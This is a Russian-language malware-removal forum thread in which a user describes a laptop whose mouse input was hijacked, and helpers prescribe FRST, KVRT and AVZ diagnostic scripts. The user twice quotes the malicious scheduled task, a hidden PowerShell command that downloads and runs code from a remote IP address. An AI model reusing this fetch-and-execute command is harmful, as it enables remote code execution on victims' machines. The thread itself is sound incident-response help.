Добрый день!
Прошу вас помочь вылечить компьютер и, по возможности, выяснить источник заражения:

Сегодня с утра ноутбук не дал пользователю открыть ни одно приложение. Кнопки мыши не работали, кнопки тачпада тоже. Интерфейс должным образом не реагировал
В планировщике задач нашлась задача с действием (сейчас удалена):
-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (irm '130.0.235.242/0x55/3')"

Кроме того на флешке, подключенной к компьютеру создался файл comment.htt , который определился защитником, как вирус.

Уважаемый(ая) ditresh60, спасибо за обращение на наш форум!

Помощь в лечении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи (https://virusinfo.info/pravila.html).

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+ (https://virusinfo.info/content.php?r=613-sub_pomogite).

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект (https://virusinfo.info/content.php?r=113-virusinfo.info-donate).

Кроме того, забыл дополнить. В исключения Защитника были добавлены типы файлов .jpg, .scr и еще какой-то. Точно уже не скажу

Некорректно собирать логи во время работы Dr. Web CureIt. что-то будет заблокировано в это время для проверки AVZ и прочих утилит, что-то из угроз будет удалено в процессе лечения. Но по логам ничего подозрительного не вижу.

Прикрепите упакованными в архив файлы отчёта report_<дата>_*.klr.enc1 из папки C:\KVRT2020_Data.

Скачайте Farbar Recovery Scan Tool (http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/) или с зеркала (https://www.geekstogo.com/forum/files/file/435-frst-farbar-recovery-scan-tool/) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать.

После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

Архивы во вложении

Выделите и скопируйте в буфер обмена следующий код:
Start::
CloseProcesses:
CreateRestorePoint:
FirewallRules: [{FA4B5A18-7119-483F-9E80-4F717CC2F89F}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe => Нет файла
FirewallRules: [{70AAA2EC-3752-4D8E-8730-000C5AC90A1A}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe => Нет файла
HKLM-x32\...\Run: [] => [X]
FirewallRules: [{FE7ECA6C-D294-42D9-9B60-FEEB64C6A697}] => (Allow) C:\Windows\twain_32\Xerox\WC3315\SCNSearch\USDAgen t.exe => Нет файла
FirewallRules: [{1BFC13C2-F420-4842-AC41-D2BEBDB3AFBC}] => (Allow) C:\Windows\twain_32\Xerox\WC3315\SCNSearch\USDAgen t.exe => Нет файла
FirewallRules: [{29BDDE5B-588E-4C8C-9CC3-159F02C13CFD}] => (Allow) C:\Program Files (x86)\Xerox\Scan Assistant\USDAgent.exe => Нет файла
FirewallRules: [{7ECA9C77-CF92-465C-824C-6BEB9E2D9EBA}] => (Allow) C:\Program Files (x86)\Xerox\Scan Assistant\USDAgent.exe => Нет файла
FirewallRules: [TCP Query User{116BD320-C909-4CB4-8E38-543744C398C8}C:\users\annal\desktop\старые удаленки\anydesk.exe] => (Allow) C:\users\annal\desktop\старые удаленки\anydesk.exe => Нет файла
FirewallRules: [UDP Query User{131C4D67-CFAB-47BB-8409-8B05DB478997}C:\users\annal\desktop\старые удаленки\anydesk.exe] => (Allow) C:\users\annal\desktop\старые удаленки\anydesk.exe => Нет файла
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
StartBatch:
del /s /q "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Cache\*.*" >nul
del /s /q "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Js\*.*" >nul
del /s /q "%userprofile%\AppData\Local\Yandex\YandexBrowser\U ser Data\Default\Cache\*.*" >nul
del /s /q "%userprofile%\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\*.*" >nul
del /s /q "%userprofile%\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\Js\*.*" >nul
del /s /q C:\Windows\Temp\*.* >nul
del /s /q "%userprofile%\AppData\Local\temp\*.*" >nul
del /s /q C:\Windows\Minidump\*.dmp >nul
ipconfig /flushdns
sfc /scannow
endbatch:
Reboot:
End::Запустите FRST.EXE/FRST64.EXE, нажмите один раз Исправить и подождите. Вставлять код никуда не нужно, программа возьмёт его из буфера обмена. Будет создан лог-файл (Fixlog.txt), прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен.

Судя по детекту KVRT - E:\comment.htt" Info="Trojan.VBS.Starter.a - вирус был на флэшке, она и могла быть источником. После зачистки Dr. Web CureIt. и KVRT, да ещё и при установленном Malwarebytes источник, боюсь, мы уже не установим.
При установке этих ломанных программ всё, что угодно могли подцепить:
Date: 2025-06-05 15:29:03
Description:
Программа Антивирусная программа Microsoft Defender обнаружила вредоносные или другие потенциально нежелательные программы.
Чтобы узнать больше, см. приведенные далее сведения.
https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:Win32/Crack!MTB&threatid=2147745913&enterprise=0
Имя: HackTool:Win32/Crack!MTB
ИД: 2147745913
Серьезность: Высокий
Категория: Программное средство
Путь: containerfile:_D:\SOFT\Adobe Illustrator 2024 28.4.1.86 RePack by KpoJIuK.exe; containerfile:_D:\SOFT\Adobe Photoshop 2024 25.6.0.433 RePack by KpoJIuK.exe; file:_D:\SOFT\Adobe Illustrator 2024 28.4.1.86 RePack by KpoJIuK.exe->(RarSfx)->Illustrator2024x64\install\Helper.exe; file:_D:\SOFT\Adobe Photoshop 2024 25.6.0.433 RePack by KpoJIuK.exe->(RarSfx)->Photoshop2024\install\Helper.exe
Начало обнаружения: Локальный компьютер
Тип обнаружения: Конкретный
Источник обнаружения: Пользователь
Пользователь: DESKTOP-P22VHN3\annal
Название процесса: Unknown
Версия службы анализа безопасности: AV: 1.429.360.0, AS: 1.429.360.0, NIS: 1.429.360.0
Версия подсистемы: AM: 1.1.25040.1, NIS: 1.1.25040.1

Date: 2025-06-05 15:29:03
Description:
Программа Антивирусная программа Microsoft Defender обнаружила вредоносные или другие потенциально нежелательные программы.
Чтобы узнать больше, см. приведенные далее сведения.
https://go.microsoft.com/fwlink/?linkid=37020&name=PUADlManager:Win32/OpenDownloadManager&threatid=312003&enterprise=0
Имя: PUADlManager:Win32/OpenDownloadManager
ИД: 312003
Серьезность: Низкий
Категория: Нежелательная программа
Путь: file:_D:\SOFT\Adobe Photoshop CC 2018 (19.0.1) x86-x64 RePack by D!akov.exe
Начало обнаружения: Локальный компьютер
Тип обнаружения: Конкретный
Источник обнаружения: Пользователь
Пользователь: DESKTOP-P22VHN3\annal
Название процесса: Unknown
Версия службы анализа безопасности: AV: 1.429.360.0, AS: 1.429.360.0, NIS: 1.429.360.0
Версия подсистемы: AM: 1.1.25040.1, NIS: 1.1.25040.1

Указанные вами действия выполнил. Файл во вложении.


Дополню подробностями.
Изначально происходило следующим образом:
- При включении компьютер имитирован нажатия клавиш мышки случайным образом, клавиатура не работала.
- Был выключен интернет.
- Через некоторое время компьютер стал работать в штатном режиме.
- В Защитнике в исключениях были обнаружены добавленные расширения .jpg и д.р
- Эти расширения были оттуда удалены
- В планировщике задач была обнаружена задача -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (irm '130.0.235.242/0x55/3')"
- Задача была удалена
- Включен режим отображения скрытых и защищенных файлов в папках
- В компьютер была воткнута отформатированная флешка с файлом антивируса kvrt
- На флешке в корне через некоторое время появился файл comment.htt
- Я проверил флешку на вирусы, файл пометился как троян. Файл был удален.
- Повторная проверка флешки - вирусов больше не показала.
- Ноутбук был проверен тремя антивирусными программами KVRT, DrWeb Cureit, malwarebytes. По итогу удалил все что нашло.

Все это происходило с 5 по 6.06

Сегодня утром 9.06 вновь стали блокироваться и мышь, началась имитация нажатий кнопок (мышка физически отключена). Через примерно 10 минут после отключения интернета все прекратилось.

Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe (https://virusinfo.info/showthread.php?t=7239):
begin
ExecuteFile('wevtutil.exe', 'epl System system.evtx', 0, 200000, false);
ExecuteFile('wevtutil.exe', 'epl Application Application.evtx', 0, 200000, false);
ExecuteFile('wevtutil.exe', 'epl Security Security.evtx', 0, 200000, false);
ExecuteFile('wevtutil.exe', 'epl "Microsoft-Windows-Windows Defender/Operational" wd.evtx "/q:*[System[(EventID=1116)]]"', 0, 200000, false);
ExecuteFile('wevtutil.exe', 'epl "Microsoft-Windows-PowerShell/Operational" "Windows PowerShell.evtx"', 0, 200000, false);
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -t7z -sdel -mx9 -m0=lzma:lp=1:lc=0:d=128m Events.7z *.evtx', 1, 300000, false);
ExitAVZ;
end.
В папке с AVZ появится архив Events.7z, загрузите его в доступное облачное хранилище или на файлообменник без капчи и дайте ссылку в теме.

Скачайте утилиту Universal Virus Sniffer отсюда (https://yadi.sk/d/6A65LkI1WEuqC) и сделайте полный образ автозапуска uVS (https://virusinfo.info/showthread.php?t=121767&p=897810&viewfull=1#post897810).

Ссылка на архив Events.7z:
https://cloud.mail.ru/public/m1Xy/sYpNnWtXi

Ничего подозрительного, ни в образе автозапуска, ни в журналах за 9-10.06.